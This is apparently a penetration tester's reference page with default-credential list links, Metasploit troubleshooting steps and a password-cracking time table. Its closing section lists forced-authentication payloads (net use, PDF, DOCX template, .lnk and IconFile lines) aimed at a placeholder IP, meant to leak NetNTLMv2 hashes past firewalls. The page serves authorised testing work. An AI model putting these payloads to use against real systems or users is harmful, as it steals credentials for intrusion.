The Cloud Source for Client Engagement Resources
General Pentest Resources:
Default Application Credential Lists:
-
Lifewire.com (Cisco)
-
A1Security.com (IP Cameras)
-
NetbiosX.Github (VoIP Systems)
-
​
Resolving Common Metasploit Issues / Modification:
​
apt-get update Error - Expired Repository Key (ED444FF07D8D0BF6)
This occures when the GPG key expires; typically in infrequently updates VM's. To fix, as root:
1. Open a terminal window
2. Paste in this command:
wget -q -O - https://archive.kali.org/archive-key.asc | apt-key add
3. Press Enter
4. Rerun apt-get update
​
Adding a Module to Metasploit:
1. FInd the appropriate module store:
a. Non-Kali install: cd/root/.msf4 Kali Install: /usr/shared/metasploit-framework/
b. cd /modules
c. Select the top-level Action Folder (e.g. exploits, etc...)
d. Select the mid-tier appropriate category folder (e.g. Remote)
e. Select the component category (e.g. httpclient)
f. Copy the new .rb file to the path
g. Start / restart Metasploit
h. Call the new module using the path/module name
​
Generalized Password Cracking Time Table (Calculated in Days)
​
# Characters No Complexity Std Complexity Std Dictionary Attack w/ Mangling
6 < 1 < 1 < 1
8 < 1 < 1 < 1
10 < 1 71 2
12 577 612,191 5
14 1,559,108 5,294,837,932 11
​
Firewall Bypass Methods to pass NetNTLMv2 responses externally:
method: {ip@{bypass-port}\{file-2-request.ext}
Examples:
​
Net Use: net use \\1.2.3.4@80\t
PDF : /F (\\\\IP@80\\t)
Dubdoc : ///IP@80/t
MS DocX: Target="file://IP@80/t.dotx"
LinkFile: URL=file://IP@80/t.htm
IconFile: IconFile=\\IP@80\t.ico
Pentest-Zen (ExitC0de00c.com)
